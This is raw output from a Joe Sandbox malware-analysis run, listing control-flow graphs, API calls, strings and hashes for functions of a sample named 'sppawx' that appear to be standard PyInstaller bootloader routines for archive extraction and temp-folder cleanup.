                                                                                                                                                                                                                              control_flow_graph 536 7ff79a3369d4-7ff79a336a47 call 7ff79a336708 539 7ff79a336a49-7ff79a336a52 call 7ff79a324f58 536->539 540 7ff79a336a61-7ff79a336a6b call 7ff79a328590 536->540 547 7ff79a336a55-7ff79a336a5c call 7ff79a324f78 539->547 545 7ff79a336a6d-7ff79a336a84 call 7ff79a324f58 call 7ff79a324f78 540->545 546 7ff79a336a86-7ff79a336aef CreateFileW 540->546 545->547 550 7ff79a336b6c-7ff79a336b77 GetFileType 546->550 551 7ff79a336af1-7ff79a336af7 546->551 558 7ff79a336da2-7ff79a336dc2 547->558 553 7ff79a336b79-7ff79a336bb4 GetLastError call 7ff79a324eec CloseHandle 550->553 554 7ff79a336bca-7ff79a336bd1 550->554 556 7ff79a336b39-7ff79a336b67 GetLastError call 7ff79a324eec 551->556 557 7ff79a336af9-7ff79a336afd 551->557 553->547 570 7ff79a336bba-7ff79a336bc5 call 7ff79a324f78 553->570 561 7ff79a336bd9-7ff79a336bdc 554->561 562 7ff79a336bd3-7ff79a336bd7 554->562 556->547 557->556 563 7ff79a336aff-7ff79a336b37 CreateFileW 557->563 568 7ff79a336be2-7ff79a336c37 call 7ff79a3284a8 561->568 569 7ff79a336bde 561->569 562->568 563->550 563->556 575 7ff79a336c39-7ff79a336c45 call 7ff79a336910 568->575 576 7ff79a336c56-7ff79a336c87 call 7ff79a336488 568->576 569->568 570->547 575->576 581 7ff79a336c47 575->581 582 7ff79a336c89-7ff79a336c8b 576->582 583 7ff79a336c8d-7ff79a336ccf 576->583 584 7ff79a336c49-7ff79a336c51 call 7ff79a32ab30 581->584 582->584 585 7ff79a336cf1-7ff79a336cfc 583->585 586 7ff79a336cd1-7ff79a336cd5 583->586 584->558 589 7ff79a336d02-7ff79a336d06 585->589 590 7ff79a336da0 585->590 586->585 588 7ff79a336cd7-7ff79a336cec 586->588 588->585 589->590 592 7ff79a336d0c-7ff79a336d51 CloseHandle CreateFileW 589->592 590->558 593 7ff79a336d86-7ff79a336d9b 592->593 594 7ff79a336d53-7ff79a336d81 GetLastError call 7ff79a324eec call 7ff79a3286d0 592->594 593->590 594->593
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1617910340-0
                                                                                                                                                                                                                              • Opcode ID: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction ID: 5f82996227fa5378870b2b28f75933b8870d17b2b7b8c67f920999bd86a178dd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4205a6958293653b93a25a06bf68436f7b6b11ca03fe036e6858b65a4e3d069e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 81C1CF32F29A418AFB24EF79C4902AD7761EB49B98B81526DDF2E57794CF38D011C310

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31841B
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A31849E
                                                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184BD
                                                                                                                                                                                                                              • FindNextFileW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184CB
                                                                                                                                                                                                                              • FindClose.KERNEL32(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184DC
                                                                                                                                                                                                                              • RemoveDirectoryW.KERNELBASE(?,00007FF79A318B09,00007FF79A313FA5), ref: 00007FF79A3184E5
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                              • String ID: %s\*
                                                                                                                                                                                                                              • API String ID: 1057558799-766152087
                                                                                                                                                                                                                              • Opcode ID: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction ID: b245a6d5e6da75a0f844115528a7a28c14c3ff5ee32dd14997095a75ec9c24f9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 754801c57d3e7d892bd8d831a0c0450fb277ac1fd7854ad2b3e1f46bb6674256
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62416221B0E54285FA70FB34E4495B9B360FB94754FC0067EE69D426D4DF3CD5468724
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                                                              • Opcode ID: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction ID: 34a9221a88493ed2c2ef344eeacc4a411f978b4c18ae2030bd93ff780e9f6f3e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f8f1f0d53470ef13f354418d29ecb311e48373b0acb6529cbcbe83ca601eafdf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 23F04422A1A64186F7709F70B489766B390BB84768F84067DEAAD026D4DF7CD0498A10

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 329 7ff79a311950-7ff79a31198b call 7ff79a3145b0 332 7ff79a311c4e-7ff79a311c72 call 7ff79a31c5c0 329->332 333 7ff79a311991-7ff79a3119d1 call 7ff79a317f80 329->333 338 7ff79a3119d7-7ff79a3119e7 call 7ff79a320744 333->338 339 7ff79a311c3b-7ff79a311c3e call 7ff79a3200bc 333->339 344 7ff79a311a08-7ff79a311a24 call 7ff79a32040c 338->344 345 7ff79a3119e9-7ff79a311a03 call 7ff79a324f78 call 7ff79a312910 338->345 343 7ff79a311c43-7ff79a311c4b 339->343 343->332 350 7ff79a311a45-7ff79a311a5a call 7ff79a324f98 344->350 351 7ff79a311a26-7ff79a311a40 call 7ff79a324f78 call 7ff79a312910 344->351 345->339 359 7ff79a311a7b-7ff79a311afc call 7ff79a311c80 * 2 call 7ff79a320744 350->359 360 7ff79a311a5c-7ff79a311a76 call 7ff79a324f78 call 7ff79a312910 350->360 351->339 371 7ff79a311b01-7ff79a311b14 call 7ff79a324fb4 359->371 360->339 374 7ff79a311b35-7ff79a311b4e call 7ff79a32040c 371->374 375 7ff79a311b16-7ff79a311b30 call 7ff79a324f78 call 7ff79a312910 371->375 380 7ff79a311b6f-7ff79a311b8b call 7ff79a320180 374->380 381 7ff79a311b50-7ff79a311b6a call 7ff79a324f78 call 7ff79a312910 374->381 375->339 389 7ff79a311b8d-7ff79a311b99 call 7ff79a312710 380->389 390 7ff79a311b9e-7ff79a311bac 380->390 381->339 389->339 390->339 393 7ff79a311bb2-7ff79a311bb9 390->393 395 7ff79a311bc1-7ff79a311bc7 393->395 396 7ff79a311bc9-7ff79a311bd6 395->396 397 7ff79a311be0-7ff79a311bef 395->397 398 7ff79a311bf1-7ff79a311bfa 396->398 397->397 397->398 399 7ff79a311bfc-7ff79a311bff 398->399 400 7ff79a311c0f 398->400 399->400 401 7ff79a311c01-7ff79a311c04 399->401 402 7ff79a311c11-7ff79a311c24 400->402 401->400 403 7ff79a311c06-7ff79a311c09 401->403 404 7ff79a311c2d-7ff79a311c39 402->404 405 7ff79a311c26 402->405 403->400 406 7ff79a311c0b-7ff79a311c0d 403->406 404->339 404->395 405->404 406->402
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A317F80: _fread_nolock.LIBCMT ref: 00007FF79A31802A
                                                                                                                                                                                                                              • _fread_nolock.LIBCMT ref: 00007FF79A311A1B
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312910: GetCurrentProcessId.KERNEL32(?,?,?,?,00000000,00000000,?,00000000,00007FF79A311B6A), ref: 00007FF79A31295E
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _fread_nolock$CurrentProcess
                                                                                                                                                                                                                              • String ID: Could not allocate buffer for TOC!$Could not allocate memory for archive structure!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$calloc$fread$fseek$malloc
                                                                                                                                                                                                                              • API String ID: 2397952137-3497178890
                                                                                                                                                                                                                              • Opcode ID: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                              • Instruction ID: 03c4d08e3115ac42c21fa2e0a380b22c70f6257345d3ce32a4b19bf3b1daf547
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7f967e8bf4bd65ccd330245f6cf3beef5728b9bf280203bc786e936cb306ff0d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: EA816E71A0EA8696FB70EB34D0452F9B3A0AF88784FC4447DE98D47785DE3CE5868760

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 407 7ff79a311600-7ff79a311611 408 7ff79a311637-7ff79a311651 call 7ff79a3145b0 407->408 409 7ff79a311613-7ff79a31161c call 7ff79a311050 407->409 414 7ff79a311682-7ff79a31169c call 7ff79a3145b0 408->414 415 7ff79a311653-7ff79a311681 call 7ff79a324f78 call 7ff79a312910 408->415 416 7ff79a31162e-7ff79a311636 409->416 417 7ff79a31161e-7ff79a311629 call 7ff79a312710 409->417 424 7ff79a3116b8-7ff79a3116cf call 7ff79a320744 414->424 425 7ff79a31169e-7ff79a3116b3 call 7ff79a312710 414->425 417->416 431 7ff79a3116f9-7ff79a3116fd 424->431 432 7ff79a3116d1-7ff79a3116f4 call 7ff79a324f78 call 7ff79a312910 424->432 433 7ff79a311821-7ff79a311824 call 7ff79a3200bc 425->433 435 7ff79a311717-7ff79a311737 call 7ff79a324fb4 431->435 436 7ff79a3116ff-7ff79a31170b call 7ff79a311210 431->436 446 7ff79a311819-7ff79a31181c call 7ff79a3200bc 432->446 441 7ff79a311829-7ff79a31183b 433->441 447 7ff79a311739-7ff79a31175c call 7ff79a324f78 call 7ff79a312910 435->447 448 7ff79a311761-7ff79a31176c 435->448 443 7ff79a311710-7ff79a311712 436->443 443->446 446->433 461 7ff79a31180f-7ff79a311814 447->461 449 7ff79a311802-7ff79a31180a call 7ff79a324fa0 448->449 450 7ff79a311772-7ff79a311777 448->450 449->461 453 7ff79a311780-7ff79a3117a2 call 7ff79a32040c 450->453 462 7ff79a3117da-7ff79a3117e6 call 7ff79a324f78 453->462 463 7ff79a3117a4-7ff79a3117bc call 7ff79a320b4c 453->463 461->446 468 7ff79a3117ed-7ff79a3117f8 call 7ff79a312910 462->468 469 7ff79a3117be-7ff79a3117c1 463->469 470 7ff79a3117c5-7ff79a3117d8 call 7ff79a324f78 463->470 475 7ff79a3117fd 468->475 469->453 472 7ff79a3117c3 469->472 470->468 472->475 475->449
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                              • Opcode ID: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                              • Instruction ID: 57a7ce00745ea4ec7df5c83e4442928506d51b162e536e70684c4233251c69a2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 607fb3d22e1abd3d0ea9d943795872ea3e60594e8e3d1f768179a624c21a25df
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80516861F0A64292FA20FB71A4001B9F3A0BF84798FC445BEEE1D07796EE3CE5558760

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetTempPathW.KERNEL32(?,?,00000000,00007FF79A313CBB), ref: 00007FF79A3188F4
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00000000,00007FF79A313CBB), ref: 00007FF79A3188FA
                                                                                                                                                                                                                              • CreateDirectoryW.KERNELBASE(?,00000000,00007FF79A313CBB), ref: 00007FF79A31893C
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318A20: GetEnvironmentVariableW.KERNEL32(00007FF79A31388E), ref: 00007FF79A318A57
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A318A20: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF79A318A79
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A3282A8: _invalid_parameter_noinfo.LIBCMT ref: 00007FF79A3282C1
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312810: MessageBoxW.USER32 ref: 00007FF79A3128EA
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Environment$CreateCurrentDirectoryExpandMessagePathProcessStringsTempVariable_invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: LOADER: failed to set the TMP environment variable.$LOADER: length of teporary directory path exceeds maximum path length!$TMP$TMP$_MEI%d
                                                                                                                                                                                                                              • API String ID: 3563477958-1339014028
                                                                                                                                                                                                                              • Opcode ID: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                              • Instruction ID: 92834b5379f009da7cd5e9f734dce4119e060e99588c96a2d9a013f169ec9d6b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4e349524156a31c65ddba45994ef87c37bf84ce1b0e485ec316371ea64373d4f
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7F41BE11B0B64251FA30FB32A8552F9B291AF89BC4FC002BDED0D4779AEE3CE5018760

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 599 7ff79a311210-7ff79a31126d call 7ff79a31bdf0 602 7ff79a311297-7ff79a3112af call 7ff79a324fb4 599->602 603 7ff79a31126f-7ff79a311296 call 7ff79a312710 599->603 608 7ff79a3112b1-7ff79a3112cf call 7ff79a324f78 call 7ff79a312910 602->608 609 7ff79a3112d4-7ff79a3112e4 call 7ff79a324fb4 602->609 621 7ff79a311439-7ff79a31144e call 7ff79a31bad0 call 7ff79a324fa0 * 2 608->621 615 7ff79a311309-7ff79a31131b 609->615 616 7ff79a3112e6-7ff79a311304 call 7ff79a324f78 call 7ff79a312910 609->616 617 7ff79a311320-7ff79a311345 call 7ff79a32040c 615->617 616->621 628 7ff79a31134b-7ff79a311355 call 7ff79a320180 617->628 629 7ff79a311431 617->629 636 7ff79a311453-7ff79a31146d 621->636 628->629 635 7ff79a31135b-7ff79a311367 628->635 629->621 637 7ff79a311370-7ff79a311398 call 7ff79a31a230 635->637 640 7ff79a31139a-7ff79a31139d 637->640 641 7ff79a311416-7ff79a31142c call 7ff79a312710 637->641 643 7ff79a31139f-7ff79a3113a9 640->643 644 7ff79a311411 640->644 641->629 645 7ff79a3113ab-7ff79a3113b9 call 7ff79a320b4c 643->645 646 7ff79a3113d4-7ff79a3113d7 643->646 644->641 650 7ff79a3113be-7ff79a3113c1 645->650 647 7ff79a3113d9-7ff79a3113e7 call 7ff79a339ea0 646->647 648 7ff79a3113ea-7ff79a3113ef 646->648 647->648 648->637 652 7ff79a3113f5-7ff79a3113f8 648->652 653 7ff79a3113cf-7ff79a3113d2 650->653 654 7ff79a3113c3-7ff79a3113cd call 7ff79a320180 650->654 656 7ff79a3113fa-7ff79a3113fd 652->656 657 7ff79a31140c-7ff79a31140f 652->657 653->641 654->648 654->653 656->641 659 7ff79a3113ff-7ff79a311407 656->659 657->629 659->617
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: CurrentProcess
                                                                                                                                                                                                                              • String ID: 1.3.1$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                              • API String ID: 2050909247-2813020118
                                                                                                                                                                                                                              • Opcode ID: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                              • Instruction ID: 9cdb12622e3148e02a00d8b745e59fab0dcd56885ffe48e76a50b76ddae2c995
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 15fc9c742c9fb12a8c4ab664e8e5c311509e27342d3a39e207e1bde7a43e7c65
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DF519F22A0A64285FA70FB32A4503BAF291EF85B94FC4457DED4D477D9EE3CE5058720

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • FreeLibrary.KERNEL32(?,?,?,00007FF79A32F11A,?,?,-00000018,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EEFC
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(?,?,?,00007FF79A32F11A,?,?,-00000018,00007FF79A32ADC3,?,?,?,00007FF79A32ACBA,?,?,?,00007FF79A325FAE), ref: 00007FF79A32EF08
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                              • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                              • API String ID: 3013587201-537541572
                                                                                                                                                                                                                              • Opcode ID: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction ID: ea1248759f8e7edf585890b3fb33f1e4769a3801da29d36e3f60c88f36506d56
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2820b76ab0802fc58bac5aaef12ed6f6fffcf0c29b30edae647068643d5e49cf
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1E41F221B1AA1241FA35EB32A804575B791BF49BA4FE8417DED1D47784EF3CE4048360

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136E1
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,00007FF79A313804), ref: 00007FF79A3136EB
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312C50: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312C9E
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312C50: FormatMessageW.KERNEL32(?,?,?,?,?,?,?,?,00007FF79A313706,?,00007FF79A313804), ref: 00007FF79A312D63
                                                                                                                                                                                                                                • Part of subcall function 00007FF79A312C50: MessageBoxW.USER32 ref: 00007FF79A312D99
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.1761440899.00007FF79A311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF79A310000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761398941.00007FF79A310000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761486515.00007FF79A33B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A34E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761534692.00007FF79A352000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.1761621851.00007FF79A354000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff79a310000_sppawx.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Message$CurrentErrorFileFormatLastModuleNameProcess
                                                                                                                                                                                                                              • String ID: Failed to convert executable path to UTF-8.$Failed to obtain executable path.$Failed to resolve full path to executable %ls.$GetModuleFileNameW$\\?\
                                                                                                                                                                                                                              • API String ID: 3187769757-2863816727
                                                                                                                                                                                                                              • Opcode ID: 6d8fde842cedad8fbf80b9c4aa3ce336361ac9392ce2c79ae57a11131fda94fc
                                                                                                                                                                                                                              • Instruction ID: 5a229fdd7c3bb9797aaf822313a529a280b8426934195dd4ae7486ff112769f0
